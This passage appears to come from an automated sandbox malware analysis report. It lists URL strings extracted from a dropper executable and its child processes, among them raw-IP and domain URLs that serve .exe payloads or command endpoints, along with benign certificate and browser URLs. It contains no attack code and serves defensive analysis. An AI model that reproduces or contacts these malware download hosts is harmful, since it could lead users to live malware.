                      Source: CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002ABD000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002ABD000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/getimage15.phpwj
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/retail.php
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/retail.phphp
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/retail.phphpb
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/space.php#
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/space.php7
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.00000000010AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.56.26/
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.00000000010AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.56.26/W
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2061680324.00000000004CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.56.26/api/bing_release.php
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.00000000010AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.56.26/api/flash.php
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.00000000010AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.56.26/api/flash.php06
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.00000000010AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.56.26/api/flash.phpDat
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.00000000010AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.56.26/api/flash.phpdow
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.00000000010AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.56.26/api/flash.phpt
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.000000000104E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.56.26/api/flash.phpxB
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.00000000010AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.56.26/z
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2061926794.00000000004A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.56.26:80/api/bing_release.php:
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.00000000010D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.56.26:80/api/flash.php
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.00000000010AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.56.26:80/api/flash.phpA
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.56.26:80/api/flash.phpso
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.23
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exe
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exe:
                      Source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                      Source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                      Source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2164957983.00000000065E5000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2165595509.0000000006B12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                      Source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                      Source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                      Source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                      Source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                      Source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2164957983.00000000065E5000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2165595509.0000000006B12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://f.alie3ksggg.com/f/oiii.exe
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fleur-de-lis.sbs/jhgfd
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fleur-de-lis.sbs/jhgfdx
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fleur-de-lis.sbs/jhgfd~
                      Source: 7U1bGcxK3Lqi_XMHDNEdJrhB.exe, 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
                      Source: _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2424687708.0000000002B0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.0/xmp
                      Source: _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2424687708.0000000002B0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.microsoft.co2/t/Re
                      Source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                      Source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                      Source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2164957983.00000000065E5000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2165595509.0000000006B12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000000.2267358139.000000000118E000.00000080.00000001.01000000.0000000E.sdmpString found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000000.2267358139.000000000118E000.00000080.00000001.01000000.0000000E.sdmpString found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000000.2267358139.000000000118E000.00000080.00000001.01000000.0000000E.sdmpString found in binary or memory: http://pki-ocsp.symauth.com0
                      Source: zfQlIB6J8n2u_zLV5LHnA1xW.exe, 0000000C.00000002.2320846713.0000000004210000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://rpi.net.au/~ajohnson/resourcehacker
                      Source: FIxDICT7hSLYFeTzbHHqKZ7Z.exe, 00000012.00000003.2329349408.000001F25CE30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://sta.alie3ksgee.com/123.456
                      Source: FIxDICT7hSLYFeTzbHHqKZ7Z.exe, 00000012.00000003.2329349408.000001F25CE30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://sta.alie3ksgee.com/aaaaaaaa.jpg
                      Source: FIxDICT7hSLYFeTzbHHqKZ7Z.exe, 00000012.00000003.2329349408.000001F25CE30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://sta.alie3ksgee.com/aaaaaaaa.jpghttp://sta.alie3ksgee.com/123.456http://sta.alie3ksgee.com/123
                      Source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                      Source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                      Source: _rSi8sV87ppx0bgkbETdFbEZ.exe, 00000010.00000003.2273853174.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, _rSi8sV87ppx0bgkbETdFbEZ.exe, 00000010.00000003.2274149557.0000000001F48000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.innosetup.com/
                      Source: _rSi8sV87ppx0bgkbETdFbEZ.exe, 00000010.00000003.2271547280.0000000001F41000.00000004.00001000.00020000.00000000.sdmp, _rSi8sV87ppx0bgkbETdFbEZ.exe, 00000010.00000003.2271423623.00000000021C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mpegla.com
                      Source: 7U1bGcxK3Lqi_XMHDNEdJrhB.exe, 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
                      Source: _rSi8sV87ppx0bgkbETdFbEZ.exe, 00000010.00000003.2273853174.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, _rSi8sV87ppx0bgkbETdFbEZ.exe, 00000010.00000003.2274149557.0000000001F48000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.remobjects.com/ps
                      Source: _rSi8sV87ppx0bgkbETdFbEZ.exe, 00000010.00000003.2273853174.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, _rSi8sV87ppx0bgkbETdFbEZ.exe, 00000010.00000003.2274149557.0000000001F48000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.remobjects.com/psU
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2052702628.0000000000400000.00000004.00001000.00020000.00000000.sdmp, 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000003.2412636025.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2613733095.000000000063D000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
                      Source: _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2402278722.0000000005B0D000.00000004.00000020.00020000.00000000.sdmp, _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2408169925.0000000005C55000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2566151117.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2567876023.00000000062A8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2409721916.0000000005EE8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2416728276.0000000005F89000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2462518721.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2455632811.00000000079C8000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2602295483.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EEmC0rfrxeQDEUW4Qmh7BQX4.exe, 00000014.00000003.2456079540.0000000002FCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2138600045.000000000441E000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2139765657.0000000004420000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2138058247.0000000004B51000.00000004.00000020.00020000.00000000.sdmp, FIxDICT7hSLYFeTzbHHqKZ7Z.exe, 00000012.00000000.2266954848.00007FF762EB9000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?
                      Source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?The
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2138600045.000000000441E000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2139765657.0000000004420000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2138058247.0000000004B51000.00000004.00000020.00020000.00000000.sdmp, FIxDICT7hSLYFeTzbHHqKZ7Z.exe, 00000012.00000000.2266954848.00007FF762EB9000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?framework=&framework_version=missing_runtime=true&arch=&rid=
                      Source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?missing_runtime=true&arch=&rid=falsetrue%pLuLdluldeEpP%c
                      Source: 7U1bGcxK3Lqi_XMHDNEdJrhB.exe, 7U1bGcxK3Lqi_XMHDNEdJrhB.exe, 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json
                      Source: J9jGBSSbDD3yrTx79DzmOLls.exe, 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2061926794.00000000004A6000.00000004.00000020.00020000.00000000.sdmp, 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.0000000000FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.myip.com/
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2061926794.00000000004A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.myip.com//l
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.0000000000FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.myip.com/O
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.0000000000FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.myip.com:443/
                      Source: _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2402278722.0000000005B0D000.00000004.00000020.00020000.00000000.sdmp, _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2408169925.0000000005C55000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2566151117.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2567876023.00000000062A8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2409721916.0000000005EE8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2416728276.0000000005F89000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2462518721.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2455632811.00000000079C8000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2602295483.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EEmC0rfrxeQDEUW4Qmh7BQX4.exe, 00000014.00000003.2456079540.0000000002FCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2402278722.0000000005B0D000.00000004.00000020.00020000.00000000.sdmp, _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2408169925.0000000005C55000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2566151117.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2567876023.00000000062A8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2409721916.0000000005EE8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2416728276.0000000005F89000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2462518721.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2455632811.00000000079C8000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2602295483.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EEmC0rfrxeQDEUW4Qmh7BQX4.exe, 00000014.00000003.2456079540.0000000002FCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2402278722.0000000005B0D000.00000004.00000020.00020000.00000000.sdmp, _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2408169925.0000000005C55000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2566151117.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2567876023.00000000062A8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2409721916.0000000005EE8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2416728276.0000000005F89000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2462518721.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2455632811.00000000079C8000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2602295483.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EEmC0rfrxeQDEUW4Qmh7BQX4.exe, 